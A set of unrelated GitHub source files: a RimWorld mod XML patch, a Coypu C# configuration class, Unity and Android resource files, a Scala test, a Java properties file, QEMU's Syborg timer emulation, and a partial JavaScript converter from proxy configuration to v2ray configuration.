defName="RH_UmbraCompany_CQB_TierII" or
defName="RH_UmbraCompany_Elite" or
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII" or
defName="RH_UmbraCompany_Sniper" or
defName="RH_UmbraCompany_Trader"
]</xpath>
<value>
<li Class="CombatExtended.LoadoutPropertiesExtension">
<primaryMagazineCount>
<min>6</min>
<max>8</max>
</primaryMagazineCount>
<sidearms>
<li>
<generateChance>1</generateChance>
<magazineCount>
<min>2</min>
<max>3</max>
</magazineCount>
<weaponTags>
<li>RN_M9HRT</li>
</weaponTags>
</li>
</sidearms>
</li>
</value>
</li>
<li Class="PatchOperationAddModExtension">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_Gunner"]</xpath>
<value>
<li Class="CombatExtended.LoadoutPropertiesExtension">
<primaryMagazineCount>
<min>3</min>
<max>4</max>
</primaryMagazineCount>
<sidearms>
<li>
<generateChance>1</generateChance>
<magazineCount>
<min>2</min>
<max>3</max>
</magazineCount>
<weaponTags>
<li>RN_M9HRT</li>
</weaponTags>
</li>
</sidearms>
</li>
</value>
</li>
<li Class="PatchOperationAddModExtension">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_Grenadier"]</xpath>
<value>
<li Class="CombatExtended.LoadoutPropertiesExtension">
<primaryMagazineCount>
<min>24</min>
<max>26</max>
</primaryMagazineCount>
<sidearms>
<li>
<generateChance>1</generateChance>
<magazineCount>
<min>2</min>
<max>3</max>
</magazineCount>
<weaponTags>
<li>RN_M9HRT</li>
</weaponTags>
</li>
</sidearms>
</li>
</value>
</li>
<!-- ========== Tweak minimum weaponMoney for selected pawn types, so that they actually spawn with weapons ========== -->
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[defName="RH_UmbraCompany_Gunner"]/weaponMoney/min</xpath>
<value>
<min>480</min>
</value>
</li>
<li Class="PatchOperationReplace">
<xpath>Defs/PawnKindDef[
defName="RH_UmbraCompany_Marksman" or
defName="RH_UmbraCompany_Marksman_TierII"
]/weaponMoney/min</xpath>
<value>
<min>400</min>
</value>
</li>
</operations>
</Operation>
</Patch> | {
"pile_set_name": "Github"
} |
using System;
using Coypu.Drivers.Selenium;
namespace Coypu
{
/// <summary>
/// Global configuration settings
/// </summary>
public class SessionConfiguration : Options
{
    const string DEFAULT_APP_HOST = "localhost";
    const int DEFAULT_PORT = 80;

    // Backing field for AppHost; always stored without a trailing slash.
    private string appHost;

    /// <summary>
    /// New default configuration
    /// </summary>
    public SessionConfiguration()
    {
        AppHost = DEFAULT_APP_HOST;
        Port = DEFAULT_PORT;
        SSL = false;
        Browser = Drivers.Browser.Firefox;
        Driver = typeof (SeleniumWebDriver);
    }

    /// <summary>
    /// <para>Specifies the browser you would like to control</para>
    /// <para>Default: Firefox</para>
    /// </summary>
    public Drivers.Browser Browser { get; set; }

    /// <summary>
    /// <para>Specifies the driver you would like to use to control the browser</para>
    /// <para>Default: SeleniumWebDriver</para>
    /// </summary>
    public Type Driver { get; set; }

    /// <summary>
    /// <para>The host of the website you are testing, e.g. 'github.com'</para>
    /// <para>Default: localhost</para>
    /// </summary>
    public string AppHost
    {
        get { return appHost;}
        set
        {
            // A full absolute URI may be supplied instead of a bare host;
            // in that case the scheme decides SSL, any user-info is
            // captured for authentication, and only the host part is kept.
            if (Uri.IsWellFormedUriString(value, UriKind.Absolute))
            {
                var uri = new Uri(value);
                SSL = uri.Scheme == "https";
                UserInfo = uri.UserInfo;
                value = uri.Host;
            }
            // Strip trailing slashes so "example.com/" == "example.com".
            appHost = value?.TrimEnd('/');
        }
    }

    // User-info ("user:password") extracted from an absolute AppHost URI.
    internal string UserInfo { get; set; }

    /// <summary>
    /// <para>The port of the website you are testing</para>
    /// <para>Default: 80</para>
    /// </summary>
    public int Port { get; set; }

    /// <summary>
    /// <para>Whether to use the HTTPS protocol to connect to website you are testing</para>
    /// <para>Default: false</para>
    /// </summary>
    public bool SSL { get; set; }
}
} | {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: df0ac90e67a8c33408b929ad40c1ab34
timeCreated: 1453913004
licenseType: Store
TextureImporter:
fileIDToRecycleName: {}
serializedVersion: 2
mipmaps:
mipMapMode: 0
enableMipMap: 1
linearTexture: 0
correctGamma: 0
fadeOut: 0
borderMipMap: 0
mipMapFadeDistanceStart: 1
mipMapFadeDistanceEnd: 3
bumpmap:
convertToNormalMap: 0
externalNormalMap: 0
heightScale: .25
normalMapFilter: 0
isReadable: 0
grayScaleToAlpha: 0
generateCubemap: 0
cubemapConvolution: 0
cubemapConvolutionSteps: 8
cubemapConvolutionExponent: 1.5
seamlessCubemap: 0
textureFormat: -1
maxTextureSize: 2048
textureSettings:
filterMode: -1
aniso: -1
mipBias: -1
wrapMode: -1
nPOTScale: 1
lightmap: 0
rGBM: 0
compressionQuality: 50
allowsAlphaSplitting: 0
spriteMode: 0
spriteExtrude: 1
spriteMeshType: 1
alignment: 0
spritePivot: {x: .5, y: .5}
spriteBorder: {x: 0, y: 0, z: 0, w: 0}
spritePixelsToUnits: 100
alphaIsTransparency: 0
textureType: -1
buildTargetSettings: []
spriteSheet:
sprites: []
spritePackingTag:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
object Test {
  def main(args: Array[String]): Unit = {
    // Boxing equality: Scala's == delegates to equals/cooperative
    // numeric comparison, so a primitive Int compares equal to a
    // java.lang.Integer in either operand order.
    val boxed: java.lang.Integer = 5
    assert(5 == boxed)
    assert(boxed == 5)
  }
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<resources>
<color name="colorPrimary">#3F51B5</color>
<color name="colorPrimaryDark">#303F9F</color>
<color name="colorAccent">#FF4081</color>
</resources>
| {
"pile_set_name": "Github"
} |
#
# Copyright (c) 2005, 2012, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation. Oracle designates this
# particular file as subject to the "Classpath" exception as provided
# by Oracle in the LICENSE file that accompanied this code.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# (C) Copyright Taligent, Inc. 1996, 1997 - All Rights Reserved
# (C) Copyright IBM Corp. 1996 - 1999 - All Rights Reserved
#
# The original version of this source code and documentation
# is copyrighted and owned by Taligent, Inc., a wholly-owned
# subsidiary of IBM. These materials are provided under terms
# of a License Agreement between Taligent and Sun. This technology
# is protected by multiple US and International patents.
#
# This notice and attribution to Taligent may not be removed.
# Taligent is a registered trademark of Taligent, Inc.
firstDayOfWeek=2
minimalDaysInFirstWeek=4
| {
"pile_set_name": "Github"
} |
/*
* Syborg Interval Timer.
*
* Copyright (c) 2008 CodeSourcery
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#include "sysbus.h"
#include "qemu-timer.h"
#include "syborg.h"
//#define DEBUG_SYBORG_TIMER
#ifdef DEBUG_SYBORG_TIMER
/* Bug fix: the debug DPRINTF referenced a nonexistent `args` identifier
 * (`##args` is the old GCC named-varargs spelling); use ## __VA_ARGS__
 * like the BADF macros so the file still compiles with debugging on. */
#define DPRINTF(fmt, ...) \
do { printf("syborg_timer: " fmt , ## __VA_ARGS__); } while (0)
#define BADF(fmt, ...) \
do { fprintf(stderr, "syborg_timer: error: " fmt , ## __VA_ARGS__); \
exit(1);} while (0)
#else
#define DPRINTF(fmt, ...) do {} while(0)
#define BADF(fmt, ...) \
do { fprintf(stderr, "syborg_timer: error: " fmt , ## __VA_ARGS__);} while (0)
#endif
/* Register indices; each register is 32 bits wide at offset index * 4. */
enum {
    TIMER_ID         = 0, /* device identification (read-only) */
    TIMER_RUNNING    = 1, /* start/stop control */
    TIMER_ONESHOT    = 2, /* 1 = fire once, 0 = periodic */
    TIMER_LIMIT      = 3, /* reload/limit value */
    TIMER_VALUE      = 4, /* current count */
    TIMER_INT_ENABLE = 5, /* interrupt enable mask */
    TIMER_INT_STATUS = 6, /* latched interrupt; write 1 bits to clear */
    TIMER_FREQ       = 7  /* tick frequency (read-only; no write case below) */
};

typedef struct {
    SysBusDevice busdev;
    ptimer_state *timer;  /* backing countdown timer */
    int running;          /* nonzero while the timer is counting */
    int oneshot;          /* nonzero in one-shot mode */
    uint32_t limit;       /* reload value mirrored into the ptimer */
    uint32_t freq;        /* set via the "frequency" qdev property */
    uint32_t int_level;   /* latched interrupt status */
    uint32_t int_enabled; /* interrupt enable mask */
    qemu_irq irq;         /* outbound interrupt line */
} SyborgTimerState;
/* Drive the outbound IRQ line from the latched status and enable mask. */
static void syborg_timer_update(SyborgTimerState *s)
{
    /* Update interrupt. */
    if (s->int_level && s->int_enabled) {
        qemu_irq_raise(s->irq);
    } else {
        qemu_irq_lower(s->irq);
    }
}
/* ptimer expiry callback: latch the interrupt; in one-shot mode also
   clear the software running flag so register reads reflect the stop. */
static void syborg_timer_tick(void *opaque)
{
    SyborgTimerState *s = (SyborgTimerState *)opaque;
    //DPRINTF("Timer Tick\n");
    s->int_level = 1;
    if (s->oneshot)
        s->running = 0;
    syborg_timer_update(s);
}
/* MMIO read handler. Register index = (offset & 0xfff) >> 2; reads of
   unknown offsets abort the CPU (treated as a guest bug). */
static uint32_t syborg_timer_read(void *opaque, target_phys_addr_t offset)
{
    SyborgTimerState *s = (SyborgTimerState *)opaque;

    DPRINTF("Reg read %d\n", (int)offset);
    offset &= 0xfff;
    switch (offset >> 2) {
    case TIMER_ID:
        return SYBORG_ID_TIMER;
    case TIMER_RUNNING:
        return s->running;
    case TIMER_ONESHOT:
        return s->oneshot;
    case TIMER_LIMIT:
        return s->limit;
    case TIMER_VALUE:
        /* Live count comes from the ptimer, not cached state. */
        return ptimer_get_count(s->timer);
    case TIMER_INT_ENABLE:
        return s->int_enabled;
    case TIMER_INT_STATUS:
        return s->int_level;
    case TIMER_FREQ:
        return s->freq;
    default:
        cpu_abort(cpu_single_env, "syborg_timer_read: Bad offset %x\n",
                  (int)offset);
        return 0;
    }
}
/* MMIO write handler. Register index = (offset & 0xfff) >> 2; writes to
   unknown offsets (including the read-only ID/FREQ) abort the CPU. */
static void syborg_timer_write(void *opaque, target_phys_addr_t offset,
                               uint32_t value)
{
    SyborgTimerState *s = (SyborgTimerState *)opaque;

    DPRINTF("Reg write %d\n", (int)offset);
    offset &= 0xfff;
    switch (offset >> 2) {
    case TIMER_RUNNING:
        if (value == s->running)
            break;
        s->running = value;
        if (value) {
            ptimer_run(s->timer, s->oneshot);
        } else {
            ptimer_stop(s->timer);
        }
        break;
    case TIMER_ONESHOT:
        /* Changing the mode while running restarts the ptimer in the
           new mode (stop, flip, run again). */
        if (s->running) {
            ptimer_stop(s->timer);
        }
        s->oneshot = value;
        if (s->running) {
            ptimer_run(s->timer, s->oneshot);
        }
        break;
    case TIMER_LIMIT:
        /* Third argument 1: also reload the current count immediately. */
        s->limit = value;
        ptimer_set_limit(s->timer, value, 1);
        break;
    case TIMER_VALUE:
        ptimer_set_count(s->timer, value);
        break;
    case TIMER_INT_ENABLE:
        s->int_enabled = value;
        syborg_timer_update(s);
        break;
    case TIMER_INT_STATUS:
        /* Write-1-to-clear semantics for the latched interrupt bits. */
        s->int_level &= ~value;
        syborg_timer_update(s);
        break;
    default:
        cpu_abort(cpu_single_env, "syborg_timer_write: Bad offset %x\n",
                  (int)offset);
        break;
    }
}
/* The same handler serves 8-, 16- and 32-bit accesses; the three array
   slots correspond to the three access widths. */
static CPUReadMemoryFunc * const syborg_timer_readfn[] = {
    syborg_timer_read,
    syborg_timer_read,
    syborg_timer_read
};

static CPUWriteMemoryFunc * const syborg_timer_writefn[] = {
    syborg_timer_write,
    syborg_timer_write,
    syborg_timer_write
};
/* Savevm callback. Field order must stay in lock-step with
   syborg_timer_load below; the ptimer state goes last. `limit` is saved
   but `freq` is not -- it is restored from the qdev property. */
static void syborg_timer_save(QEMUFile *f, void *opaque)
{
    SyborgTimerState *s = opaque;

    qemu_put_be32(f, s->running);
    qemu_put_be32(f, s->oneshot);
    qemu_put_be32(f, s->limit);
    qemu_put_be32(f, s->int_level);
    qemu_put_be32(f, s->int_enabled);

    qemu_put_ptimer(f, s->timer);
}
/* Loadvm callback; only snapshot version 1 is understood. Reads fields
   in the exact order syborg_timer_save wrote them. */
static int syborg_timer_load(QEMUFile *f, void *opaque, int version_id)
{
    SyborgTimerState *s = opaque;

    if (version_id != 1)
        return -EINVAL;

    s->running = qemu_get_be32(f);
    s->oneshot = qemu_get_be32(f);
    s->limit = qemu_get_be32(f);
    s->int_level = qemu_get_be32(f);
    s->int_enabled = qemu_get_be32(f);

    qemu_get_ptimer(f, s->timer);

    return 0;
}
/* qdev init: validates the mandatory "frequency" property, wires up the
   IRQ, registers the 4K MMIO region, creates the ptimer (ticking via a
   bottom half) and hooks up savevm handlers. */
static int syborg_timer_init(SysBusDevice *dev)
{
    SyborgTimerState *s = FROM_SYSBUS(SyborgTimerState, dev);
    QEMUBH *bh;
    int iomemtype;

    /* freq comes from the qdev property; a zero value is a config error. */
    if (s->freq == 0) {
        fprintf(stderr, "syborg_timer: Zero/unset frequency\n");
        exit(1);
    }
    sysbus_init_irq(dev, &s->irq);
    iomemtype = cpu_register_io_memory(syborg_timer_readfn,
                                       syborg_timer_writefn, s,
                                       DEVICE_NATIVE_ENDIAN);
    sysbus_init_mmio(dev, 0x1000, iomemtype);

    bh = qemu_bh_new(syborg_timer_tick, s);
    s->timer = ptimer_init(bh);
    ptimer_set_freq(s->timer, s->freq);
    register_savevm(&dev->qdev, "syborg_timer", -1, 1,
                    syborg_timer_save, syborg_timer_load, s);
    return 0;
}
/* Device registration: exposes the timer as qdev "syborg,timer" with a
   single mandatory "frequency" property (default 0 => init fails). */
static SysBusDeviceInfo syborg_timer_info = {
    .init = syborg_timer_init,
    .qdev.name  = "syborg,timer",
    .qdev.size  = sizeof(SyborgTimerState),
    .qdev.props = (Property[]) {
        DEFINE_PROP_UINT32("frequency",SyborgTimerState, freq, 0),
        DEFINE_PROP_END_OF_LIST(),
    }
};

static void syborg_timer_register_devices(void)
{
    sysbus_register_withprop(&syborg_timer_info);
}

device_init(syborg_timer_register_devices)
| {
"pile_set_name": "Github"
} |
const util = require('util')
const log = require('electron-log')
const base64url = require('base64url')
// Collect the sub-config names referenced by INCLUDE lines that appear
// inside section `sect` of the conf text (comments stripped, section
// aliases honoured).
const readSubConfigBySection = (config, sect) => {
  const names = []
  let current = ''
  config.match(/[^\r\n]+/g).forEach((rawLine) => {
    const line = removeLineComments(rawLine)
    const header = getSection(line)
    if (header.length !== 0) {
      current = header
      return // section header: switch context, nothing to collect
    }
    if (!equalSection(current, sect)) {
      return
    }
    const trimmed = line.trim()
    if (trimmed.includes('INCLUDE')) {
      names.push(trimmed.split(',')[1].trim())
    }
  })
  return names
}
// Section names that should be treated as the same section.
const sectionAlias = [
  ['RoutingRule', 'Rule'],
]

// Extract the section name from a "[Section]" header line, or return ''
// when the line is not a section header.
const getSection = (line) => {
  const header = /^\s*\[\s*([^\]]*)\s*\]\s*$/
  const m = line.match(header)
  return m ? m[1] : ''
}

// Compare two section names, honouring the alias table above.
const equalSection = (s1, s2) => {
  const a = s1.trim()
  const b = s2.trim()
  const aliased = sectionAlias.some(
    (group) => group.includes(a) && group.includes(b)
  )
  return aliased || a === b
}
// Strip a ';' comment from a single config line. The original pattern
// /;[^*]*/ stopped matching at the first '*', leaving comment residue on
// lines whose comment contained an asterisk; a ';' comment runs to the
// end of the line.
const removeLineComments = (s) => {
  return s.replace(/;.*$/g, '')
}
// Strip '#' and '//' comments from a single JSON-ish config line. Same
// fix as removeLineComments: the original /[^*]*/ tails stopped at the
// first '*', leaving residue; comments run to end of line.
const removeJsonLineComments = (s) => {
  s = s.replace(/#.*$/g, '')
  s = s.replace(/\/\/.*$/g, '')
  return s
}
// Strip '#' and '//' comments from every line of a JSON-ish config blob,
// rejoining with '\n'.
const removeJsonComments = (s) => {
  return s
    .match(/[^\r\n]+/g)
    .map(removeJsonLineComments)
    .join('\n')
}
// Return the trimmed, non-empty lines that live inside section `sect`
// of the conf text (comments stripped, section aliases honoured).
const getLinesBySection = (conf, sect) => {
  const collected = []
  let current = ''
  conf.match(/[^\r\n]+/g).forEach((rawLine) => {
    const line = removeLineComments(rawLine)
    const header = getSection(line)
    if (header.length !== 0) {
      current = header
      return // section header: nothing to collect
    }
    if (!equalSection(current, sect)) {
      return
    }
    const trimmed = line.trim()
    if (trimmed.length !== 0) {
      collected.push(trimmed)
    }
  })
  return collected
}
// Two rule types are mergeable when both are DOMAIN-flavoured, both are
// IP-flavoured, or they are the same literal type.
const equalRuleType = (t1, t2) => {
  const bothDomain = t1.includes('DOMAIN') && t2.includes('DOMAIN')
  const bothIp = t1.includes('IP') && t2.includes('IP')
  return bothDomain || bothIp || t1 == t2
}
// Map a rule type onto the v2ray routing-rule field it populates.
// Bug fix: the original `return new Error(...)` handed an Error object
// back to callers, which would silently use it as a property name;
// unknown types now throw.
const ruleName = (type) => {
  if (type.includes('DOMAIN')) {
    return 'domain'
  }
  if (type.includes('IP')) {
    return 'ip'
  }
  if (type.includes('PROCESS')) {
    return 'app'
  }
  if (type.includes('PORT')) {
    return 'port'
  }
  if (type.includes('NETWORK')) {
    return 'network'
  }
  throw new Error('invalid rule type')
}
// True for rule types whose v2ray field takes a single scalar filter
// rather than a list.
const nonListType = (type) => {
  return type.includes('PORT') || type.includes('NETWORK') || type.includes('FINAL')
}

// Normalize collected filters for a rule: scalar (non-list) types take
// exactly one filter; list types keep the whole array. Bug fix: the
// original *returned* `new Error(...)` on violation instead of throwing
// (and its message had a typo); it now throws.
const ruleFilter = (type, filters) => {
  if (nonListType(type)) {
    if (filters.length > 1) {
      throw new Error('more than 1 filter in non-list type rule')
    }
    return filters[0]
  }
  return filters
}
// Whether `tag` names one of the configured balancers.
const isBalancerTag = (tag, balancers) => {
  return balancers.some((b) => b.tag == tag)
}
// Translate Surge-style rule lines into v2ray routing rules.
// Consecutive lines sharing a mergeable type and the same target are
// accumulated into one rule whose filter is the collected list; INCLUDE
// lines recursively splice in sub-config rule files, optionally forcing
// every spliced rule onto `overrideTarget`.
const constructRoutingRules = (rule, routing, subconfig, overrideTarget=undefined) => {
  // Accumulator for the current run of same-type/same-target lines.
  var lastType = ''
  var lastTarget = ''
  var filters = []
  var routingRules = []
  rule.forEach((line) => {
    const parts = line.trim().split(',')
    if (parts.length < 2) {
      return // next
    }
    const type = parts[0].trim()
    // override target
    const target = overrideTarget ? overrideTarget : parts[parts.length-1].trim()
    // Flush the accumulated run when the type/target changes, or when the
    // incoming type cannot carry a filter list at all.
    if (filters.length > 0 && (nonListType(type) || !equalRuleType(type, lastType) || target !== lastTarget)) {
      var r = {
        type: 'field',
      }
      // Target is either a balancer tag or a plain outbound tag.
      if (isBalancerTag(lastTarget, routing.balancers)) {
        r['balancerTag'] = lastTarget
      } else {
        r['outboundTag'] = lastTarget
      }
      r[ruleName(lastType)] = ruleFilter(lastType, filters)
      routingRules.push(r)
      lastType = ''
      lastTarget = ''
      filters = []
    }
    if (type === 'INCLUDE') {
      // INCLUDE,<name>[,<target>] splices in another RoutingRule file.
      if (parts.length <= 3) {
        const content = subconfig['RoutingRule'][parts[1].trim()]
        const routingRule = getLinesBySection(content, 'RoutingRule')
        const subRules = constructRoutingRules(routingRule, routing, subconfig, parts.length === 3 ? parts[2].trim() : undefined)
        routingRules = routingRules.concat(subRules)
      } else {
        return // next
      }
    }
    // Arity check: ordinary rules are TYPE,FILTER,TARGET; FINAL is
    // FINAL,TARGET (no filter). With overrideTarget the target may be
    // omitted from the line itself.
    if (type !== 'FINAL') {
      if (parts.length != 3 && !overrideTarget) {
        return // next
      }
    } else {
      if (parts.length != 2) {
        return // next
      }
    }
    lastType = type
    lastTarget = target
    // Convert the Surge filter spelling into v2ray's.
    var filter = parts[1].trim()
    switch (type) {
      case 'DOMAIN-KEYWORD':
        filters.push(filter)
        break
      case 'DOMAIN-SUFFIX':
        filters.push(util.format('domain:%s', filter))
        break
      case 'DOMAIN':
      case 'DOMAIN-FULL':
        filters.push(util.format('full:%s', filter))
        break
      case 'IP-CIDR':
        filters.push(filter)
        break
      case 'GEOIP':
        filters.push(util.format('geoip:%s', filter))
        break
      case 'PORT':
        filters.push(filter)
        break
      case 'PROCESS-NAME':
        filters.push(filter)
        break
      case 'NETWORK':
        filters.push(filter.split(':').join(','))
        break
      case 'FINAL':
        // FINAL becomes a catch-all rule; the matching dimension depends
        // on the configured domainStrategy (IP catch-all vs network).
        if (routing.domainStrategy == 'IPIfNonMatch' || routing.domainStrategy == 'IPOnDemand') {
          filters.push('0.0.0.0/0')
          filters.push('::/0')
          lastType = 'IP-CIDR'
        } else {
          filters.push('tcp,udp')
          lastType = 'NETWORK'
        }
        break
    }
  })
  // Flush whatever run is still pending after the last line.
  if (filters.length > 0) {
    var r = {
      type: 'field',
    }
    if (isBalancerTag(lastTarget, routing.balancers)) {
      r['balancerTag'] = lastTarget
    } else {
      r['outboundTag'] = lastTarget
    }
    r[ruleName(lastType)] = ruleFilter(lastType, filters)
    routingRules.push(r)
  }
  return routingRules
}
// Build the v2ray "routing" object from the Routing / Strategy /
// Balancer / Rule / Dns sections of the conf file. Each argument is the
// list of lines of the corresponding section; `subconfig` carries the
// sub-config files referenced by INCLUDE rules.
const constructRouting = (routingConf, strategy, balancer, rule, dns, subconfig) => {
  var routing = { balancers: [], rules: [] }
  // [Routing] section: key=value pairs; only domainStrategy is known.
  routingConf.forEach((line) => {
    const parts = line.trim().split('=')
    if (parts.length != 2) {
      return // next
    }
    const k = parts[0].trim()
    const v = parts[1].trim()
    switch (k) {
      case 'domainStrategy':
        if (v.length > 0) {
          routing.domainStrategy = v
        }
        break
    }
  })
  // Deprecated [Strategy] section: a bare strategy name per line.
  strategy.forEach((line) => {
    line = line.trim()
    if (line.length != 0) {
      routing.domainStrategy = line
    }
  })
  // [Balancer] section: tag,sel1:sel2[,strategy[,k=v...]]
  balancer.forEach((line) => {
    const parts = line.trim().split(',')
    if (parts.length < 2) {
      return // next
    }
    const tag = parts[0].trim()
    const selectors = parts[1].trim().split(':').map(x => x.trim())
    var bnc = {
      tag: tag,
      selector: selectors
    }
    if (parts.length > 2) {
      bnc.strategy = parts[2].trim()
    }
    switch (bnc.strategy) {
      case 'latency':
        const params = parts.slice(3, parts.length)
        params.forEach((p) => {
          const ps = p.trim().split('=')
          if (ps.length != 2) {
            return // next
          }
          // Bug fix: `key` and `val` were assigned without declaration,
          // leaking implicit globals (and throwing in strict mode).
          const key = ps[0].trim()
          const val = ps[1].trim()
          switch (key) {
            // Numeric latency-strategy knobs are parsed as integers.
            case 'timeout':
            case 'interval':
            case 'delay':
            case 'tolerance':
            case 'totalMeasures':
              bnc[key] = parseInt(val)
              break
            default:
              bnc[key] = val
          }
        })
        break
    }
    routing.balancers.push(bnc)
  })
  routing.rules = constructRoutingRules(rule, routing, subconfig)
  // [Dns] hijack=<tag>: route tun2socks UDP/53 traffic to that outbound,
  // prepended so it wins over every other rule.
  dns.forEach((line) => {
    const parts = line.trim().split('=')
    if (parts.length != 2) {
      return // next
    }
    const k = parts[0].trim()
    const v = parts[1].trim()
    if (k == 'hijack' && v.length > 0) {
      routing.rules.unshift({
        type: 'field',
        outboundTag: v,
        inboundTag: ['tun2socks'],
        network: 'udp',
        port: 53
      })
    }
  })
  // Omit empty sections entirely, matching v2ray's expectations.
  if (routing.balancers.length == 0) {
    delete routing.balancers
  }
  if (routing.rules.length == 0) {
    delete routing.rules
  }
  return routing
}
// Build the v2ray "dns" config object.
//
// dnsConf:  [Dns] lines of `key = value` (only clientIp is read here)
// server:   [DnsServer] lines — either a bare address, or `address,port,tag`
// rule:     [DnsRule] lines — `TYPE,filter,tag` binding domains to a server tag
// host:     [DnsHost] lines — `domain = ip` static mappings
// clientIp: deprecated single-line client IP (used only when exactly one line)
// Returns { clientIp?, hosts?, servers? } — `servers` removed when empty.
const constructDns = (dnsConf, server, rule, host, clientIp) => {
  var dns = { servers: [] }
  dnsConf.forEach((line) => {
    const parts = line.trim().split('=')
    if (parts.length != 2) {
      return // next
    }
    const k = parts[0].trim()
    const v = parts[1].trim()
    if (k == 'clientIp' && v.length > 0) {
      dns.clientIp = v
    }
  })
  // Deprecated: a lone [DnsClientIp] line overrides the [Dns] value.
  if (clientIp.length == 1) {
    const ip = clientIp[0].trim()
    if (ip.length > 0) {
      dns.clientIp = ip
    }
  }
  host.forEach((line) => {
    const parts = line.trim().split('=')
    if (parts.length != 2) {
      return // next
    }
    const domain = parts[0].trim()
    const ip = parts[1].trim()
    if (domain.length == 0 || ip.length == 0) {
      return // next
    }
    // `hosts` is only added to the result when at least one mapping exists.
    if (!dns.hasOwnProperty('hosts')) {
      dns.hosts = {}
    }
    dns.hosts[domain] = ip
  })
  var servers = []
  var rules = []
  rule.forEach((line) => {
    const parts = line.trim().split(',')
    if (parts.length != 3) {
      return // next
    }
    const type = parts[0].trim()
    var filter = parts[1].trim()
    const tag = parts[2].trim()
    // Translate the rule type into a v2ray domain-matcher prefix.
    switch (type) {
      case 'DOMAIN-SUFFIX':
        filter = util.format('domain:%s', filter)
        break
      case 'DOMAIN':
      case 'DOMAIN-FULL':
        filter = util.format('full:%s', filter)
        break
    }
    rules.push({
      filter: filter,
      tag: tag
    })
  })
  server.forEach((line) => {
    const parts = line.trim().split(',')
    if (parts.length == 1) {
      // Bare address. On Windows, 'localhost' expands to the system's
      // configured DNS resolvers.
      if (process.platform == 'win32' && parts[0].trim() == 'localhost') {
        const sysDnsServers = require('dns').getServers()
        sysDnsServers.forEach((sysDns) => {
          servers.push({
            address: sysDns
          })
        })
      } else {
        servers.push({
          address: parts[0].trim()
        })
      }
    } else if (parts.length == 3) {
      // Tagged server: collect every rule filter bound to the same tag.
      var filters = []
      rules.forEach((r) => {
        if (r.tag == parts[2].trim()) {
          filters.push(r.filter)
        }
      })
      servers.push({
        address: parts[0].trim(),
        port: parseInt(parts[1].trim()),
        filters: filters
      })
    }
  })
  // Shape the final list: tagged servers become {address, port, domains}
  // objects; bare servers collapse to plain address strings.
  servers.forEach((s) => {
    if (s.hasOwnProperty('port') && s.hasOwnProperty('filters')) {
      dns.servers.push({
        address: s.address,
        port: parseInt(s.port),
        domains: s.filters
      })
    } else {
      dns.servers.push(s.address)
    }
  })
  if (dns.servers.length == 0) {
    delete dns.servers
  }
  return dns
}
// Parse the [Log] section (`key = value` lines) into a v2ray log object.
// Only `loglevel` is recognized; malformed lines are silently skipped.
const constructLog = (logLines) => {
  const log = {}
  logLines.forEach((line) => {
    const kv = line.trim().split('=')
    if (kv.length !== 2) {
      return // malformed line, skip
    }
    if (kv[0].trim() === 'loglevel') {
      log.loglevel = kv[1].trim()
    }
  })
  return log
}
// Build a "freedom" outbound. `params` are `key=value` strings; only
// `domainStrategy` is honored. The `settings` member is omitted when empty.
const freedomOutboundParser = (tag, params) => {
  const outbound = {
    "protocol": "freedom",
    "tag": tag
  }
  const settings = {}
  for (const param of params) {
    const kv = param.trim().split('=')
    if (kv.length !== 2) {
      continue
    }
    if (kv[0].trim() === 'domainStrategy') {
      settings.domainStrategy = kv[1].trim()
    }
  }
  if (Object.keys(settings).length > 0) {
    outbound.settings = settings
  }
  return outbound
}
// Build a "blackhole" outbound. `params` are `key=value` strings; only
// `type` is honored and becomes settings.response.type. The `settings`
// member is omitted when empty.
const blackholeOutboundParser = (tag, params) => {
  const outbound = {
    "protocol": "blackhole",
    "tag": tag
  }
  const settings = {}
  for (const param of params) {
    const kv = param.trim().split('=')
    if (kv.length !== 2) {
      continue
    }
    if (kv[0].trim() === 'type') {
      settings.response = { type: kv[1].trim() }
    }
  }
  if (Object.keys(settings).length > 0) {
    outbound.settings = settings
  }
  return outbound
}
// Build an "http" or "socks" outbound with a single server entry.
// Recognized params: address, port, user, pass. The `users` list is
// included only when both user and pass are non-empty.
const httpAndSocksOutboundParser = (protocol, tag, params) => {
  const outbound = {
    "protocol": protocol,
    "tag": tag
  }
  let address = ''
  let port = 0
  let user = ''
  let pass = ''
  for (const param of params) {
    const kv = param.trim().split('=')
    if (kv.length !== 2) {
      continue
    }
    const value = kv[1].trim()
